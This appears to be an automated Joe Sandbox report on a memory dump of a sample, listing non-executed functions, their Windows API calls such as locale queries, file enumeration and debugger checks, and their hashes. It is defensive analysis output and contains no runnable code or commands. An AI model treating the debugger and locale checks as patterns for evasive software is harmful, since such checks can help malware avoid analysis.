Instruction ID: 9b0f3e107fcacab96ed9fbb2b4b841535266c953a3716559829086066040995f
Opcode Fuzzy Hash: 55fe6d043838a3200d0bddd7ca5e7e061d0524c0368c5661c3d2fd20545043af
Instruction Fuzzy Hash: 5ED05EB08082089FC700FBAC984201DB7E4AE80200F1181B4E84C87201E63498118BA3

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0090B5AD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 0090B646
GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 0090B66F
GetACP.KERNEL32 ref: 0090B684

Strings

OCP, xrefs: 0090B601
ACP, xrefs: 0090B5CB

Memory Dump Source

Source File: 00000003.00000002.1658433931.0000000000879000.00000020.00000001.01000000.00000006.sdmp, Offset: 00850000, based on PE: true

Associated: 00000003.00000002.1658412173.0000000000850000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000851000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.000000000085E000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000923000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658848314.000000000092A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658848314.00000000009EA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659259590.00000000009F5000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659279243.00000000009F6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659297615.00000000009F7000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659313208.00000000009F9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659330028.00000000009FA000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659351055.00000000009FC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659367517.00000000009FF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659384894.0000000000A01000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659384894.0000000000A37000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659433850.0000000000A45000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_850000_2zx1310.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 6faba923c83df10ab6f848391b525f62aa3799e8d99e43da43a4f4f085f6fa46
Instruction ID: 2e34ad82053530c7c79bc227a071f4c924e2a40fab688d537f5bad2db922b05b
Opcode Fuzzy Hash: 6faba923c83df10ab6f848391b525f62aa3799e8d99e43da43a4f4f085f6fa46
Instruction Fuzzy Hash: 5921BE62710201EEEB34CF65C905BABB3AEEF94B74B568564E90AD7190E733DE40C790

Uniqueness

Uniqueness Score: -1.00%

Function 0090B7F6 Relevance: 7.7, APIs: 5, Instructions: 183COMMON

Download Yara Rule

APIs

GetUserDefaultLCID.KERNEL32 ref: 0090B902
IsValidCodePage.KERNEL32(00000000), ref: 0090B94B
IsValidLocale.KERNEL32(?,00000001), ref: 0090B95A
GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 0090B9A2
GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 0090B9C1

Memory Dump Source

Source File: 00000003.00000002.1658433931.0000000000879000.00000020.00000001.01000000.00000006.sdmp, Offset: 00850000, based on PE: true

Associated: 00000003.00000002.1658412173.0000000000850000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000851000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.000000000085E000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000923000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658848314.000000000092A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658848314.00000000009EA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659259590.00000000009F5000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659279243.00000000009F6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659297615.00000000009F7000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659313208.00000000009F9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659330028.00000000009FA000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659351055.00000000009FC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659367517.00000000009FF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659384894.0000000000A01000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659384894.0000000000A37000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659433850.0000000000A45000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_850000_2zx1310.jbxd

Yara matches

Similarity

API ID: Locale$InfoValid$CodeDefaultPageUser
String ID:
API String ID: 3475089800-0
Opcode ID: e80d09ee6fd79092a8567747de5c1ad92ccea61fd5118954f2a198c04b140d09
Instruction ID: 977290602c3fa470cdbf50521616a34119504ff791f2e450787b025e8ea46bbf
Opcode Fuzzy Hash: e80d09ee6fd79092a8567747de5c1ad92ccea61fd5118954f2a198c04b140d09
Instruction Fuzzy Hash: AC515E72A00206AFDB10DFA5CC51ABE73BCFF44704F144469EA25E7190E7709A44DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00905322 Relevance: 6.1, APIs: 4, Instructions: 129fileCOMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 009053BD
FindNextFileW.KERNEL32(00000000,?), ref: 00905438
FindClose.KERNEL32(00000000), ref: 0090545A
FindClose.KERNEL32(00000000), ref: 0090547D

Memory Dump Source

Source File: 00000003.00000002.1658433931.0000000000879000.00000020.00000001.01000000.00000006.sdmp, Offset: 00850000, based on PE: true

Associated: 00000003.00000002.1658412173.0000000000850000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000851000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.000000000085E000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000923000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658848314.000000000092A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658848314.00000000009EA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659259590.00000000009F5000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659279243.00000000009F6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659297615.00000000009F7000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659313208.00000000009F9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659330028.00000000009FA000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659351055.00000000009FC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659367517.00000000009FF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659384894.0000000000A01000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659384894.0000000000A37000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659433850.0000000000A45000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_850000_2zx1310.jbxd

Yara matches

Similarity

API ID: Find$CloseFile$FirstNext
String ID:
API String ID: 1164774033-0
Opcode ID: aee1254f0ae5a36bc8ee63c78296b09766284680a746b6281e432130d48f210e
Instruction ID: e9103a4bb684f07aa06752eaa8a6f8c85316f5a0e96936c5066de7c57447d94a
Opcode Fuzzy Hash: aee1254f0ae5a36bc8ee63c78296b09766284680a746b6281e432130d48f210e
Instruction Fuzzy Hash: 6341B071900A19AEDF20DF68DC88AFBB3BDEB84345F118195E40597194EA709E80CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0087B1E6 Relevance: 6.1, APIs: 4, Instructions: 109COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0087BD19
IsDebuggerPresent.KERNEL32 ref: 0087BDE5
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0087BE05
UnhandledExceptionFilter.KERNEL32(?), ref: 0087BE0F

Memory Dump Source

Source File: 00000003.00000002.1658433931.0000000000879000.00000020.00000001.01000000.00000006.sdmp, Offset: 00850000, based on PE: true

Associated: 00000003.00000002.1658412173.0000000000850000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000851000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.000000000085E000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000923000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658848314.000000000092A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658848314.00000000009EA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659259590.00000000009F5000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659279243.00000000009F6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659297615.00000000009F7000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659313208.00000000009F9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659330028.00000000009FA000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659351055.00000000009FC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659367517.00000000009FF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659384894.0000000000A01000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659384894.0000000000A37000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659433850.0000000000A45000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_850000_2zx1310.jbxd

Yara matches

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 6903f6c9cb9210eeb5f80975b0080c480cb736b7af8e5613f3423e358153739b
Instruction ID: d6f664545b99ccb75e9ef11884f8afc439c0b0fdb868a8c42c341ff2d272dd1e
Opcode Fuzzy Hash: 6903f6c9cb9210eeb5f80975b0080c480cb736b7af8e5613f3423e358153739b
Instruction Fuzzy Hash: 05415C7580520DEBDF10EFA4D949BDDBBB8FF04305F1041A9A80CE6291EB719A88CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00889AA1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30windowCOMMON

Download Yara Rule

APIs

GetLocaleInfoEx.KERNEL32(!x-sys-default-locale,20000001,?,00000002), ref: 00889AB6
FormatMessageA.KERNEL32(00001300,00000000,?,?,?,00000000,00000000), ref: 00889AD8

Strings

!x-sys-default-locale, xrefs: 00889AB1

Memory Dump Source

Source File: 00000003.00000002.1658433931.0000000000879000.00000020.00000001.01000000.00000006.sdmp, Offset: 00850000, based on PE: true

Associated: 00000003.00000002.1658412173.0000000000850000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000851000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.000000000085E000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000923000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658848314.000000000092A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658848314.00000000009EA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659259590.00000000009F5000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659279243.00000000009F6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659297615.00000000009F7000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659313208.00000000009F9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659330028.00000000009FA000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659351055.00000000009FC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659367517.00000000009FF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659384894.0000000000A01000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659384894.0000000000A37000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659433850.0000000000A45000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_850000_2zx1310.jbxd

Yara matches

Similarity

API ID: FormatInfoLocaleMessage
String ID: !x-sys-default-locale
API String ID: 4235545615-2729719199
Opcode ID: f0d19111acab6365d19d9fbd300a1d52d9528095c3687ac07265551cfc0f5987
Instruction ID: 51537804b394a5cd153bd3bf8498a54bc099574d0c99acf183869b34d39af6d1
Opcode Fuzzy Hash: f0d19111acab6365d19d9fbd300a1d52d9528095c3687ac07265551cfc0f5987
Instruction Fuzzy Hash: 96E06DB2164108FFFB049FA0CC0BDBB7BACEB45755F008119B901D2190E6B06E00DA61

Uniqueness

Uniqueness Score: -1.00%

Function 0090B153 Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0090B1A7
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0090B1F1
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0090B2B7

Memory Dump Source

Source File: 00000003.00000002.1658433931.0000000000879000.00000020.00000001.01000000.00000006.sdmp, Offset: 00850000, based on PE: true

Associated: 00000003.00000002.1658412173.0000000000850000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000851000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.000000000085E000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000923000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658848314.000000000092A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658848314.00000000009EA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659259590.00000000009F5000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659279243.00000000009F6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659297615.00000000009F7000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659313208.00000000009F9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659330028.00000000009FA000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659351055.00000000009FC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659367517.00000000009FF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659384894.0000000000A01000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659384894.0000000000A37000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659433850.0000000000A45000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_850000_2zx1310.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 178e4ee756b08f06cfea267b21085d9e2db77f33903287ddc92585ea863792bf
Instruction ID: cc8459bb89bf2f570e1f9e7c1ecbb19d7499444ada0180a801102118c2aaa72f
Opcode Fuzzy Hash: 178e4ee756b08f06cfea267b21085d9e2db77f33903287ddc92585ea863792bf
Instruction Fuzzy Hash: 40617E729152079FDB289F28CC82BBAB7ACFF14311F20417AE915C66C5EB34D985DB50

Uniqueness

Uniqueness Score: -1.00%

Function 0087C161 Relevance: 1.6, APIs: 1, Instructions: 147COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0087C177

Memory Dump Source

Source File: 00000003.00000002.1658433931.0000000000879000.00000020.00000001.01000000.00000006.sdmp, Offset: 00850000, based on PE: true

Associated: 00000003.00000002.1658412173.0000000000850000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000851000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.000000000085E000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000923000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658848314.000000000092A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658848314.00000000009EA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659259590.00000000009F5000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659279243.00000000009F6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659297615.00000000009F7000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659313208.00000000009F9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659330028.00000000009FA000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659351055.00000000009FC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659367517.00000000009FF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659384894.0000000000A01000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659384894.0000000000A37000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659433850.0000000000A45000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_850000_2zx1310.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 74d36d52e1515c5e91ff03889207145f84938e5ba63ce18dbd21b07ad0913be9
Instruction ID: 1275c338be36426502aaf4c756c400ba6b2f89d33cd4f67034b99a2ed580bb64
Opcode Fuzzy Hash: 74d36d52e1515c5e91ff03889207145f84938e5ba63ce18dbd21b07ad0913be9
Instruction Fuzzy Hash: 88515AB1A242098BEB14CF95D9917BABBF0FB48314F24C02AE409EB369D375DA40DF50

Uniqueness

Uniqueness Score: -1.00%

Function 0090B43A Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0090B48E

Memory Dump Source

Source File: 00000003.00000002.1658433931.0000000000879000.00000020.00000001.01000000.00000006.sdmp, Offset: 00850000, based on PE: true

Associated: 00000003.00000002.1658412173.0000000000850000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000851000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.000000000085E000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000923000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658848314.000000000092A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658848314.00000000009EA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659259590.00000000009F5000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659279243.00000000009F6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659297615.00000000009F7000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659313208.00000000009F9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659330028.00000000009FA000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659351055.00000000009FC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659367517.00000000009FF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659384894.0000000000A01000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659384894.0000000000A37000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659433850.0000000000A45000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_850000_2zx1310.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: aa4227aeeef559e29e15a285b0a8522be08038f8d55eed5257300cee90b445dd
Instruction ID: fec837296fddc3cbfc6d8d423e6d8fedf9cdf7f4eecaa4e4c1d2ba87f08171a6
Opcode Fuzzy Hash: aa4227aeeef559e29e15a285b0a8522be08038f8d55eed5257300cee90b445dd
Instruction Fuzzy Hash: BE218072A14206AFDB289B29DC52ABB77ACEF44315B10007AFE05D7292EB34AE45C750

Uniqueness

Uniqueness Score: -1.00%

Function 0090AFE5 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

EnumSystemLocalesW.KERNEL32(0090B153,00000001), ref: 0090B057

Memory Dump Source

Source File: 00000003.00000002.1658433931.0000000000879000.00000020.00000001.01000000.00000006.sdmp, Offset: 00850000, based on PE: true

Associated: 00000003.00000002.1658412173.0000000000850000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000851000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.000000000085E000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000923000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658848314.000000000092A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658848314.00000000009EA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659259590.00000000009F5000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659279243.00000000009F6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659297615.00000000009F7000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659313208.00000000009F9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659330028.00000000009FA000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659351055.00000000009FC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659367517.00000000009FF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659384894.0000000000A01000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659384894.0000000000A37000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659433850.0000000000A45000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_850000_2zx1310.jbxd

Yara matches

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: 87126a8d749b65f69919bf5328711e35a2de6d74ca77969de3875cce07ee0dcd
Instruction ID: 13ea79bd1f9cf06c69f18019fc327155e13d7268191b59f4ddb309b3f8d62eba
Opcode Fuzzy Hash: 87126a8d749b65f69919bf5328711e35a2de6d74ca77969de3875cce07ee0dcd
Instruction Fuzzy Hash: C511E53B6047019FDB189F39C8A16BAB7A5FF80368B18442CE95787B80D371A942C740

Uniqueness

Uniqueness Score: -1.00%

Function 0090819D Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 009081A4

Memory Dump Source

Source File: 00000003.00000002.1658433931.0000000000879000.00000020.00000001.01000000.00000006.sdmp, Offset: 00850000, based on PE: true

Associated: 00000003.00000002.1658412173.0000000000850000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000851000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.000000000085E000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000923000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658848314.000000000092A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658848314.00000000009EA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659259590.00000000009F5000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659279243.00000000009F6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659297615.00000000009F7000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659313208.00000000009F9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659330028.00000000009FA000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659351055.00000000009FC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659367517.00000000009FF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659384894.0000000000A01000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659384894.0000000000A37000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659433850.0000000000A45000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_850000_2zx1310.jbxd

Yara matches

Similarity

API ID: DebuggerPresent
String ID:
API String ID: 1347740429-0
Opcode ID: 25375e5051851828ed4b4fdc9fdbff8c5ff51886c1bf16ddba0cd2a5195ace1f
Instruction ID: 2366ee356a3bc9f77e2aa01a8ec39edc91a0db8356f85924f7c9d1de5fc55309
Opcode Fuzzy Hash: 25375e5051851828ed4b4fdc9fdbff8c5ff51886c1bf16ddba0cd2a5195ace1f
Instruction Fuzzy Hash: 49F0A431244914BEDF212E599C46B7F371DFF123A5F280810FD65D6082CE25D85695B2

Uniqueness

Uniqueness Score: -1.00%

Function 0090B6F4 Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0090B36F,00000000,00000000,?), ref: 0090B720

Memory Dump Source

Source File: 00000003.00000002.1658433931.0000000000879000.00000020.00000001.01000000.00000006.sdmp, Offset: 00850000, based on PE: true

Associated: 00000003.00000002.1658412173.0000000000850000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000851000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.000000000085E000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000923000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658848314.000000000092A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658848314.00000000009EA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659259590.00000000009F5000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659279243.00000000009F6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659297615.00000000009F7000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659313208.00000000009F9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659330028.00000000009FA000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659351055.00000000009FC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659367517.00000000009FF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659384894.0000000000A01000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659384894.0000000000A37000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659433850.0000000000A45000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_850000_2zx1310.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
